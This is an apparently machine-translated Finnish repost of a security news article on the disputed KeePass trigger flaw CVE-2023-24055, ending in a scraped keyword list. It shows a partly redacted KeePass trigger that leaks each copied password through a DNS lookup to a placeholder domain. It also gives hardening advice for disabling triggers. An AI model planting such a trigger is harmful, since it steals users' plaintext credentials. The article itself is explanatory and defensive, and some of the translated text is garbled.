Muutama viikko on ollut uutisarvoinen salasanojen hallinnoijille – käteville apuohjelmille, joiden avulla voit keksiä eri salasanan jokaiselle käyttämällesi verkkosivustolle ja seurata niitä kaikkia.
Vuoden 2022 lopussa oli LastPassin vuoro olla uutisissa, kun yritys vihdoin myönsi, että elokuussa 2022 kokemansa tietomurto päätyi todellakin asiakkaiden salasanaan. holvit varastetaan pilvipalvelusta, johon ne varmuuskopioitiin.
(Itse salasanoja ei varastettu, koska varastot olivat salattuja, eikä LastPassilla ollut kopioita kenenkään "pääavaimesta" itse varmuuskopiovarastotiedostoille, mutta se oli lähempää kuin useimmat ihmiset mielellään kuulivat.)
Sitten oli LifeLockin vuoro olla uutisissa, kun yritys varoitti ihottumasta. salasanan arvaushyökkäykset, perustuu luultavasti salasanoihin, jotka varastettiin täysin toiselta verkkosivustolta, mahdollisesti jokin aika sitten, ja ehkä ostettu pimeästä verkosta äskettäin.
LifeLockia itseään ei ollut rikottu, mutta osa sen käyttäjistä oli salasanojen jakamisen ansiosta, joka johtui riskeistä, joita he eivät ehkä edes muista ottaneensa.
Myös kilpailijat 1Password ja BitWarden ovat olleet uutisissa viime aikoina, koska ne perustuvat Googlen ilmeisesti tahattomasti lähettämiin haitallisiin mainoksiin, jotka houkuttelivat käyttäjät vakuuttavasti kirjautumissivujen replikoihin, joiden tarkoituksena oli kalastella heidän tilitietojaan.
Nyt on KeePassin vuoro uutisissa, tällä kertaa vielä toinen kyberturvallisuusongelma: väitetty alttius, ammattikieltä, jota käytetään ohjelmistovirheistä, jotka johtavat kyberturvallisuusaukoihin, joita hyökkääjät voivat hyödyntää pahoihin tarkoituksiin.
Salasanan nuuskiminen on tehty helpoksi
Me viittaamme siihen a alttius täällä, koska sillä on virallinen virhetunniste, jonka on myöntänyt Yhdysvaltain kansallinen standardi- ja teknologiainstituutti.
Vika on dubattu CVE-2023-24055: Hyökkääjä, jolla on kirjoitusoikeudet XML-määritystiedostoon, [voi] hankkia selväkieliset salasanat lisäämällä vientikäynnistimen.
Väite selkeän tekstin salasanojen saamisesta on valitettavasti totta.
Jos minulla on kirjoitusoikeus henkilökohtaisiin tiedostoihisi, mukaan lukien ns %APPDATA%
hakemistoon, voin ovelaa muokata asetusosaa muokatakseni jo mukautettuja KeePass-asetuksia tai lisätä mukautuksia, jos et ole tietoisesti muuttanut mitään…
…ja voin yllättävän helposti varastaa selkotekstisalasanasi, joko joukkona, esimerkiksi poistamalla koko tietokannan salaamattomana CSV-tiedostona tai käyttäessäsi niitä, esimerkiksi asettamalla "ohjelmakoukun", joka laukeaa aina, kun käytät salasana tietokannasta.
Huomaa, että en tarvitse ylläpitäjä käyttöoikeuksia, koska minun ei tarvitse sotkea todellista asennushakemistoa, johon KeePass-sovellus tallennetaan, mikä on tavallisesti tavallisten käyttäjien ulkopuolella
Enkä tarvitse pääsyä lukittuihin yleisiin määritysasetuksiin.
Mielenkiintoista on, että KeePass tekee kaikkensa estääkseen salasanojesi haistamisen, kun käytät niitä, mukaan lukien peukalointisuojaustekniikoiden avulla estämään erilaisia näppäinlogger-temppuja jopa käyttäjiltä, joilla on jo järjestelmänvalvojan valtuudet.
Mutta KeePass-ohjelmiston avulla on myös yllättävän helppoa kaapata selkeitä salasanatietoja, ehkä tavoilla, joita saatat pitää "liian helpoksi", jopa muille kuin järjestelmänvalvojille.
Kesti minuutin työ käyttää KeePass GUI:ta a Laukaista tapahtuma, joka suoritetaan joka kerta, kun kopioit salasanan leikepöydälle, ja määrität tapahtuman suorittamaan DNS-haun, joka sisälsi sekä kyseisen käyttäjänimen että tavallisen salasanan:
Voisimme sitten kopioida tuon vaihtoehdon ei-hirveän ilmeisen XML-asetuksen omasta paikallisesta asetustiedostostamme järjestelmän toisen käyttäjän asetustiedostoon, minkä jälkeen hekin löytäisivät salasanojaan vuotaneen Internetin kautta DNS-hakujen kautta.
Vaikka XML-määritystiedot ovat suurelta osin luettavissa ja informatiivisia, KeePass käyttää uteliaana satunnaisia tietojonoja, jotka tunnetaan nimellä GUID (lyhenne sanoista maailmanlaajuisesti yksilölliset tunnisteet) tarkoittaa erilaisia Laukaista asetukset, jotta myös hyvin perillä oleva käyttäjä tarvitsisi laajan viiteluettelon ymmärtääkseen, mitkä triggerit asetetaan ja miten.
DNS-vuotolaukaisimemme näyttää tältä, vaikka muokkasimme joitain yksityiskohtia, jotta et voi joutua välittömiin pahoihin kopioimalla ja liittämällä tämä teksti suoraan:
XXXXXXXXXXXXXXXXXXXXX Kopio Varasta tavaraa DNS-hakujen kautta XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test Totta 1
Kun tämä liipaisin on aktiivinen, KeePass-salasanan käyttäminen saa selvän tekstin vuotamaan huomaamattomassa DNS-haussa valitsemaani verkkotunnukseen, joka on blah.test
tässä esimerkissä.
Huomaa, että tosielämän hyökkääjät melkein varmasti sekoittaisivat tai hämärtäisivät varastetun tekstin, mikä paitsi vaikeuttaisi DNS-vuotojen havaitsemista, myös huolehtisi salasanoista, jotka sisältävät muita kuin ASCII-merkkejä, kuten aksentoituja kirjaimia tai hymiöitä, joita ei muuten voi käyttää DNS-nimissä:
Mutta onko se todella bugi?
Hankala kysymys kuitenkin on, "Onko tämä todella virhe, vai onko se vain tehokas ominaisuus, jota joku, joka jo nyt tarvitsisi vähintään yhtä paljon hallita yksityisiä tiedostojasi, voi käyttää väärin kuin sinulla itselläsi on?"
Yksinkertaisesti sanottuna, onko se haavoittuvuus, jos joku, joka jo hallitsee tiliäsi, voi selata tiedostoja, joihin tilisi pitäisi joka tapauksessa päästä käsiksi?
Vaikka saatat toivoa, että pssword Manager sisältää paljon ylimääräisiä peukalointisuojakerroksia, jotka vaikeuttaisivat tällaisten vikojen/ominaisuuksien väärinkäyttöä, kannattaa CVE-2023-24055 todella olla CVE-listattu haavoittuvuus?
Jos näin on, eivät komennot, kuten DEL
(poista tiedosto) ja FORMAT
pitääkö olla myös "bugeja"?
Ja eikö PowerShellin olemassaolo, joka tekee mahdollisesti vaarallisesta käyttäytymisestä paljon helpompi provosoida (kokeile powerhsell get-clipboard
esimerkiksi), olla oma haavoittuvuus?
Tämä on KeePassin kanta, jonka vahvistaa seuraava teksti, joka on lisätty "vika" yksityiskohta NISTin verkkosivuilla:
** KIISTAUTETTU ** […] HUOMAUTUS: toimittajan kanta on, että salasanatietokantaa ei ole tarkoitettu suojatuksi hyökkääjää vastaan, jolla on samantasoinen pääsy paikalliseen tietokoneeseen.
Mitä tehdä?
Jos olet itsenäinen KeePass-käyttäjä, voit tarkistaa, onko yllä luomamme "DNS-varastajan" kaltaisia vilpillisiä laukaisimia avaamalla KeePass-sovellus ja tutustumalla Työkalut > Liipaisimet… ikkuna:
Huomaa, että voit kääntää koko Laukaista järjestelmä pois tästä ikkunasta yksinkertaisesti poistamalla valinnan [ ] Enable trigger system
vaihtoehto…
…mutta se ei ole yleinen asetus, joten se voidaan ottaa uudelleen käyttöön paikallisen määritystiedoston kautta, mikä suojaa sinua vain virheiltä sen sijaan, että hyökkääjä, jolla on pääsy tiliisi.
Voit pakottaa vaihtoehdon pois päältä kaikilta tietokoneen käyttäjiltä ilman mahdollisuutta ottaa sitä takaisin käyttöön muokkaamalla yleistä "lockdown"-tiedostoa KeePass.config.enforced.XML
, joka löytyy hakemistosta, johon itse sovellusohjelma on asennettu.
Triggerit pakotetaan pois päältä kaikilta, jos globaali XML-valvontatiedostosi näyttää tältä:
väärä
(Jos ihmettelet, hyökkääjällä, jolla on kirjoitusoikeudet sovellushakemistoon tämän muutoksen kumoamiseksi, on lähes varmasti tarpeeksi järjestelmätason valtaa muokata itse KeePass-suoritettavaa tiedostoa tai asentaa ja aktivoida joka tapauksessa erillisen näppäinloggerin.)
Jos olet verkonvalvoja, jonka tehtävänä on lukita KeePass käyttäjien tietokoneilla, jotta se on edelleen tarpeeksi joustava auttaakseen heitä, mutta ei tarpeeksi joustavaa, jotta he voisivat auttaa vahingossa verkkorikollisia, suosittelemme lukemaan KeePassin Turvallisuusongelmat sivu, laukaisee sivu ja Pakotettu määritys sivu.
- SEO-pohjainen sisällön ja PR-jakelu. Vahvista jo tänään.
- Platoblockchain. Web3 Metaverse Intelligence. Tietoa laajennettu. Pääsy tästä.
- Lähde: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- pystyy
- Meistä
- edellä
- absoluuttinen
- pääsy
- Pääsy
- Tili
- aktiivinen
- lisä-
- hyväksytty
- mainokset
- Jälkeen
- vastaan
- Kaikki
- väitetty
- jo
- ja
- Toinen
- sovelluksen
- Hakemus
- Elokuu
- kirjoittaja
- auto
- takaisin
- Tukena
- background-image
- Varmuuskopiointi
- perustua
- koska
- ovat
- reunus
- pohja
- rikkominen
- Vika
- Bugs
- kaapata
- joka
- tapaus
- aiheutti
- syyt
- keskus
- varmasti
- muuttaa
- merkkejä
- tarkastaa
- valinta
- vaatia
- lähempänä
- pilvi
- väri
- Tulla
- yritys
- täysin
- tietokone
- tietokoneet
- olosuhteet
- Konfigurointi
- Harkita
- ohjaus
- kappaletta
- voisi
- kattaa
- luoda
- luotu
- cve
- verkkorikollisille
- tietoverkkojen
- Vaarallinen
- tumma
- tumma Web
- tiedot
- tietokanta
- yksityiskohdat
- DID
- eri
- suoraan
- näyttö
- dns
- verkkotunnuksen
- Dont
- alas
- dubattuna
- helpompaa
- helposti
- myöskään
- salattu
- täytäntöönpano
- tarpeeksi
- Koko
- Jopa
- tapahtuma
- Joka
- jokainen
- esimerkki
- Käyttää hyväkseen
- vienti
- laaja
- lisää
- Ominaisuus
- harvat
- filee
- Asiakirjat
- Vihdoin
- Löytää
- joustava
- jälkeen
- voima
- löytyi
- alkaen
- saada
- saada
- Global
- Goes
- kätevä
- onnellinen
- ottaa
- korkeus
- auttaa
- tätä
- Holes
- toivoa
- liihottaa
- Miten
- Kuitenkin
- HTML
- HTTPS
- tunniste
- Välitön
- in
- sisältää
- mukana
- Mukaan lukien
- informatiivinen
- asentaa
- esimerkki
- Instituutti
- Internet
- kysymys
- Annettu
- IT
- itse
- ammattikieli
- Pitää
- tunnettu
- suureksi osaksi
- LastPass
- kerrokset
- johtaa
- vuotaa
- Vuodot
- Taso
- Lista
- paikallinen
- Katsoin
- ulkonäkö
- Katso ylös
- tehty
- tehdä
- TEE
- johtaja
- Päättäjät
- Marginaali
- max-width
- ehkä
- virhe
- virheitä
- muokata
- eniten
- nimet
- kansallinen
- Tarve
- verkko
- uutiset
- NIST
- normaali
- saada
- virallinen
- avaaminen
- Vaihtoehto
- muuten
- oma
- parametri
- Salasana
- salasanat
- Paavali
- PC
- Ihmiset
- ehkä
- henkilöstö
- Phishing
- plaintext
- Platon
- Platonin tietotieto
- PlatonData
- sijainti
- Viestejä
- mahdollisesti
- teho
- voimakas
- valtuudet
- PowerShell
- yksityinen
- oikeudet
- todennäköisesti
- Ohjelma
- osti
- tarkoituksiin
- laittaa
- kysymys
- satunnainen
- ihottuma
- Lukeminen
- äskettäin
- suositella
- säännöllinen
- muistaa
- vastaus
- raportoitu
- Raportit
- käänteinen
- riskit
- ajaa
- Osa
- turvallinen
- tunne
- palvelu
- setti
- asetus
- settings
- Lyhyt
- shouldnt
- yksinkertaisesti
- So
- Tuotteemme
- vankka
- jonkin verran
- Joku
- Kaupallinen
- itsenäinen
- standardit
- Yhä
- varastettu
- stop
- tallennettu
- niin
- tarkoitus
- SVG
- järjestelmä
- ottaa
- tekniikat
- Elektroniikka
- -
- heidän
- itse
- siksi
- Kautta
- aika
- että
- liian
- ylin
- raita
- siirtyminen
- läpinäkyvä
- laukaista
- totta
- VUORO
- Sorvatut
- tyypillisesti
- unique
- URL
- us
- käyttää
- käyttäjä
- Käyttäjät
- apuohjelmia
- eri
- Holvi
- holvit
- kautta
- alttius
- W3
- tavalla
- verkko
- Verkkosivu
- viikkoa
- Mitä
- joka
- KUKA
- tulee
- Mietitkö
- Referenssit
- olisi
- kirjoittaa
- XML
- Sinun
- itse
- zephyrnet